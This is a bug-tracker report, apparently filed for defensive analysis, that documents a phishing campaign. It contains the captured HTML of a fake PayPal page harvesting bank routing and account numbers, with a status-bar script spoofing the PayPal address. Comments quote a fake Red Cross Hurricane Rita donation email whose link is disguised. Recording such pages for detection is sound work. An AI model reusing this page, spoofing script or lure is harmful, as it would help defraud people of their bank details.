</tbody></table></div></td></tr> <tr><td valign="top"> <table align="center" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td><table align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr> <td class="topSpacer" width="150"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="150"></td> <td class="topSpacer" width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td class="topSpacer" width="100%"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="1"></td> </tr> <tr><td colspan="3">The safety and security of your bank account information is protected by PayPal. 
We protect against unauthorized withdrawals and will notify you by email whenever you deposit or withdraw funds from this bank account.<br><br> </td></tr> </tbody></table></td></tr></tbody> </tbody></table></table> <FORM action="www.paypal.com" method="post" name="securityForm"><table class="formTable" align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr> <td class="topSpacer" width="150"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="150"></td> <td class="topSpacer" width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td class="topSpacer" width="100%"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="1"></td> </tr> <tr> <td class="label"><label for="bank_acct_country_name">Country:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td>United States</td> </tr> <tr> <td class="label"><label for="bank_acct_bank_name">Bank Name:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td><input size="20" maxlength="64" name="bank_acct_bank_name" value="" type="text"></td> </tr> <tr> <td class="label"><label for="bank_acct_account_type">Account Type:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <input checked="checked" name="bank_acct_account_type" value="checking" type="radio">Checking<br><input name="bank_acct_account_type" value="savings" type="radio">Savings</td> </tr> <tr> <td class="label"><label for="bank_acct_routing_number1">Routing Number:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <img src="UpDate-Credts_files/symbol_route.gif" alt="" border="0"><input size="20" maxlength="23" name="bank_acct_routing_number1" value="" type="text"><img src="UpDate-Credts_files/symbol_route.gif" 
alt="" border="0"><br>Is usually located between the <img src="UpDate-Credts_files/symbol_route.gif" alt="" border="0"> symbols on your check.</td> </tr> <tr> <td class="label"><label for="bank_acct_account_number">Account Number:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <input size="20" maxlength="17" name="bank_acct_account_number" value="" type="text"><img src="UpDate-Credts_files/symbol_account_small.gif" alt="" border="0"><br>Typically comes before the <img src="UpDate-Credts_files/symbol_account_small.gif" alt="" border="0"> symbol. Its exact location and number of digits varies from bank to bank.</td> </tr> <tr> <td class="label"><label for="bank_acct_account_number">Re-enter Account Number:</label></td> <td width="6"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="6"></td> <td> <input size="20" maxlength="17" name="bank_acct_retype_account_number" value="" type="text"><img src="UpDate-Credts_files/symbol_account_small.gif" alt="" border="0"> </td> </tr> </tbody></table> <br><table align="center" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td><img src="UpDate-Credts_files/check_zoom_sm.gif" alt="" border="0"></td></tr></tbody></table> <table cellSpacing="0" cellPadding="0" border="0"> <tbody> <tr vAlign="top"> <td><img src="UpDate-Credts_files/secret.jpg" alt="" border="1"><br> <img height="1" src="http://www.paypal.com/images/pixel.gif" width="210" border="0"></td> <td><img height="1" src="http://www.paypal.com/images/pixel.gif" width="6" border="0"></td> <td><input id="string_answer" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; WIDTH: 215px; FONT-FAMILY: verdana,arial,helvetica,sans-serif" maxLength="8" size="12" name="string_answer"></td> </tr> </tbody> </table> <table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"> <tbody><tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" class="verticalSpacerHigh" border="0" 
height="1" width="1"></td></tr> <tr><td class="separationLine"><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="2" width="1"></td></tr> <tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" class="verticalSpacerMedium" border="0" height="1" width="1"></td></tr> </tbody></table> </tr><tr> <TD><SPAN class=small><SPAN class=emphasis>For your protection, we verify credit card and debit card billing addresses.</SPAN><BR>The process normally takes about 30 seconds, but it may take longer during certain times of the day. Please click the<SPAN class=emphasis> Confirm</SPAN> button to update your information. When your card has been successfully added, you will see a confirmation page.</SPAN></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD align=left> <SCRIPT language=JavaScript>function DisableAndSubmitVar (whichform,submitVar) { ua = new String(navigator.userAgent); if (ua.match(/IE/g)) { for (i=1; i <whichform.elements.length; i++) { if (whichform.elements[i].type == 'submit') { whichform.elements[i].disabled = true; } } var input = document.createElement('INPUT'); input.style.display = 'none'; input.name = submitVar; input.value = '1'; whichform.appendChild(input); } whichform.submit(); } </SCRIPT> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR> <TD><IMG class=verticalSpacerHigh height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD class=separationLine><IMG height=2 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD><IMG class=verticalSpacerMedium height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR> <TD class=globalButtons align=right width="100%"><input name=cancel_add.x onclick="return check_all(this.form);" type=submit value="confirm"> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD> <TD 
width=20><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=20 border=0></TD> <TD vAlign=top width=120><A href="https://www.paypalcreditcard.com/paypalbanner?banner_id=paypal/web/11&paypal_id=03B7378DDFA23AC484499BDA3343D5E2"><IMG height=600 alt="" src="UpDate-Credts_files/bnr_PVNbnr3_120x600.gif" width=120 align=top border=0></A></TD></TR> <TR> <TD colSpan=3><IMG height=5 alt="" src="UpDate-Credts_files/pixelPIN.gif" width=1 border=0></TD></TR></TBODY></TABLE></FORM></TD></TR></TBODY></TABLE></DIV> <DIV id=xptFooter> <TABLE cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD> <P><A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/mobile">Mobile | </A><A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/batch">Mass Pay</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_upgrade-interest-marcom">Money Market</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_dc-intro">ATM/Debit Card</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_pay-bill">BillPay</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb">Referrals</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/about">About Us</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/accounts">Account Types</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees">Fees</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy">Privacy</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_bc-signup">Buyer Credit</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center">Security Center</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us">Contact Us</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua">User Agreement</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_pdn-intro">Developers</A> | <A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_shop">Shops</A> | <A 
href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-pie-available">Gift Certificates/Points</A></P> <P><A class=ebayLink href="http://www.ebay.com/" target=_blank>PayPal, an eBay company</A></P> <P class=lastPara>Copyright © 1999-2005 PayPal. All rights reserved.<BR><A href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/fdic">Information about FDIC pass-through insurance</A><BR></P></TD></TR></TBODY></TABLE><BR></DIV></DIV></BODY></HTML> </form> </form> <SCRIPT type=text/javascript></SCRIPT> <SCRIPT language=JavaScript src="" type=text/javascript> <script src="verify/pp_main.js"></SCRIPT> <SCRIPT> <!-- Hide from old browsers // All you have to do is put another text in the variable message. // Don't forget to break all lines with a ^ // When you do not place a ^ at the end of all the message, the // message will not repeat message = "https://www.paypal.com/" scrollSpeed = 12 lineDelay = 6000000000000000000 // Do not change the text below // txt = "" function scrollText(pos) { if (message.charAt(pos) != '^') { txt = txt + message.charAt(pos) status = txt pauze = scrollSpeed } else { pauze = lineDelay txt = "" if (pos == message.length-1) pos = -1 } pos++ setTimeout("scrollText('"+pos+"')",pauze) } // Unhide --> scrollText(0) </SCRIPT>
Updated•19 years ago
|
Summary: phishing site content analysis → phishing site content analysis
Reporter | ||
Comment 1•19 years ago
|
||
E-mail used to start the phish: "Hurricane Rita Relief Thank you for contributing to the Hurricane Rita Relief operation. To reduce donor wait times caused by high volume, the American Red Cross has partnered with Microsoft and MSN to help handle donation processing. Less than a month after Katrina, Hurricane Rita is now churning towards the Gulf coast. The Red Cross has opened shelters and pre-positioned staff and supplies - we're ready to respond. Your financial gift to Hurricane Rita relief efforts will help the Red Cross provide shelter, food, counseling and other assistance to those affected by this hurricane. Click here to make a donation. https://give.redcross.org/donation-form.asp" The link text shows the give.redcross.org address, but the link actually points at http://www.directcomputersystems.co.uk/pub/redcross/index.htm
Reporter | ||
Comment 2•19 years ago
|
||
Reporter | ||
Comment 3•19 years ago
|
||
Note the VeriSign link on the page where the redirect landed. This one even leads the user to think the site belongs to the Red Cross: https://digitalid.verisign.com/as2/85f8777e6ab9f73e87366e9f0d61168b
Comment 4•12 years ago
|
||
Chris Hofmann: Is this bug report still useful in any way (if so, please elaborate how) or can this be closed?
Reporter | ||
Comment 5•12 years ago
|
||
incomplete
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → INCOMPLETE